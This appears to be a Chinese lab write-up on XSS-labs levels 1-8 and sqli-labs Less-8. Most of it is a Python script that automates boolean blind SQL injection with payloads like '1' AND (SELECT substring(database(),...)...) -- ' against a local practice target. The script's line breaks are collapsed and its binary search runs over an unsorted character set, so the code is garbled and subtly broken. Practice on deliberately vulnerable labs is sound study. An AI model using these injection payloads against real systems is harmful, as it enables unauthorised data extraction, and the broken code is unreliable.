Xss-labs 1-8以及利用python自动sq8注入
Xss-labs 1-8
- 发现>、<都被过滤掉了,但是没有将预定义字符转义,需要用双引号进行属性闭合。
使用二分查找进行python实现自动化布尔盲注(sqli8
import requests# 目标URL
url = "http://127.0.0.1/sqli/Less-8/index.php"# 要推断的数据库信息(例如:数据库名)
database_name = ""# 字符集(可以根据需要扩展)
charset = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-. "# 推断数据库名的长度def get_database_length():length = 0while True:length += 1payload = f"1' AND (SELECT length(database()) = {length}) -- "response = requests.get(url, params={"id": payload})if "You are in..........." in response.text:return lengthif length > 50: # 防止无限循环breakreturn 0# 推断数据库名def get_database_name(length):db_name = ""for i in range(1, length + 1):left, right = 0, len(charset) - 1while left <= right:mid = (left + right) // 2char = charset[mid]payload = f"1' AND (SELECT substring(database(), {i}, 1) >= '{char}') -- "response = requests.get(url, params={"id": payload})if "You are in" in response.text:left = mid + 1else:right = mid - 1db_name += charset[right]return db_name# 主函数
if __name__ == "__main__":length = get_database_length()if length > 0:print(f"Database length: {length}")db_name = get_database_name(length)print(f"Database name: {db_name}")else:print("Failed to determine database length.")